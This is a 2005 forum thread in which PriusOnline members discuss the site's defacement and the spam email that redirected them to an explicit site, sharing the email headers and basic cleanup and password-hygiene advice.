PriusOnline Hacked!!

ok, i thought that email was phony.

 

I got that email too. I hope everythign will be alright.

 

Here are the email headers in case that's of any use. Presumably they got access to the list of email addresses of users. You should probably delete any email with the subject "We Have New Website!!!!!!" or anything from [email protected]

Received: from dynamocomputers.com ([69.64.32.45])
by sccrmxc13.comcast.net (sccrmxc13) with SMTP
id <20050305225756s13008a4qpe>; Sat, 5 Mar 2005 22:57:56 +0000
X-Originating-IP: [69.64.32.45]
Received: (qmail 28191 invoked from network); 5 Mar 2005 22:53:36 -0000
Received: from gmga.net (HELO mail.priusonline.com) (69.64.32.45)
by endwellumc.us with SMTP; 5 Mar 2005 22:53:31 -0000
Subject: We Have New Website!!!!!
To: [email protected]
Reply-to: [email protected]
From: [email protected]
Return-Path: [email protected]
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 8bit
Date: Sat, 5 Mar 2005 17:53:11 -0500
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: PHP
X-MimeOLE: Produced By phpBB2
X-AntiAbuse: Board servername - www.priusonline.com
X-AntiAbuse: User_id - 2
X-AntiAbuse: Username - jeff
X-AntiAbuse: User IP - 62.57.182.184
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on dynamocomputers.com
X-Spam-Level: *
X-Spam-Status: No, hits=1.1 required=5.0 tests=AWL,MISSING_OUTLOOK_NAME,
NO_REAL_NAME,PLING_PLING autolearn=no version=2.63

 

With two firewalls, one in the router and ZoneAlarm, and real time virus protection, I allowed the redirected site to load.

It is a sexually explicit porn site.

Just to be on the safe side, I am updating my virus definitions and running a scan.

 

If you've visited the redirected site you might want to delete the cookie it leaves behind and the .js, .gif, .jpg files from http://naonak.defacers.com.mx it leaves behind in your Temporary Internet Files directory.

The cookie just contains:
phpbb2mysql_data
a%3A0%3A%7B%7D
www.priusonline.com/
1024
3844875008
29769902
1826853808
29696477
*

 

I have my Internet Options set to delete the temp files when I close the browser.

I looked for such a cookie, but found none.

Thanks

 

Or you can just get a Mac and download your e-mail and visit your web sites with impunity....

I got the offending e-mail too and got redirected to the spanish porn site... bummer for PriusOnline.... I guess I'll be getting more spam soon.

 

I am on OS X on a Mac and I purged the cookies. Anything else to do? I reported the email as spam to comcast. Should I call the Attorney Generals Office for Washington State? We have a spam law. If I was still running OS 9 I would have no doubts but I am still working through this UNIX OS X thing. Why would someone want to send a total Gringo like me to a foreign language site. I have no idea what was going on. I do English and can puzzle out German and that's it. One day I will learn enough Polish to decipher my genealogy. I hope Satin is holding a special circle in hell for these folks.

 

Damnit, If I got an email from them that means I'm going to get Spam. I've had this email account safe from Spam for 3 years.

I visited the web site but was not redirected to a porn site. I guess the code doesn’t work for FireFox. I behind a cheap linkys router firewall so I'm sure I'm not protected. I don't run Anti Virus either.

I had it once. Then one day Norton started asking me to pay for it again. I was like!!!! No. Ok.... Uninstall. I already paid the 40 bucks for it once.... I don't want to keep paying that year after year.

So. I probably have a virus. Whooo! I guess I’m one of those people on the AOL commercials that are just asking for Viruses. Well, my computer is still running. Its not going slower. I have so much spyware on it already I don’t even care anymore. I hate computers.

 

I checked my email on the server, did not download it to my PC. Sure enough, that spam email was there. While I deleted it off the roster of email's in my inbox, I expect to get hosed with spam now.

 

PriusOnline is back now. The site director is aware of the problem and is working on it.

 

The other thing to be cautious about is if you use that password with anything else with that userame or email address.

We don't know at this time how hacked they were.

If you do, you might want to change those passwords, just to be safe.

 

That's why for all these groups I use an e-mail addy that is already compromised and a different user/password than what I use for accounts that need more safety (like banks). The information is too easily hacked these days *sigh*.

I use SafeID and RoboForm to keep track of all the usernames/passwords. Otherwise I'd be lost.

By the By, I haven't noticed my Firefox doing anything weird after I went to Prius Online during the hack period. There seem to be no cookies. The e-mail was not flagged by my virus software. I think they were nasty but not evil.

Lisa

 

This is why you should always keep public and private e-mails separate; never publicly list addresses you don't want spammed. Also, your e-mails were already known to the spammers long before PriusOnline got hacked -- e-mail "spiders" crawl the web just like Google does, except they search for e-mail addresses and add them to a database so later mass e-mails can be sent to every address that's found.

I run a website, and I encode all e-mail addresses, and decode them client-side using JavaScript. It looks perfectly normal for users, but since e-mail spiders never run JavaScript, they never see the actual e-mail addresses.

 

<div class='quotetop'>QUOTE(TimeFor\";p=\"69819)</div>

Try AVG, its free for personal use.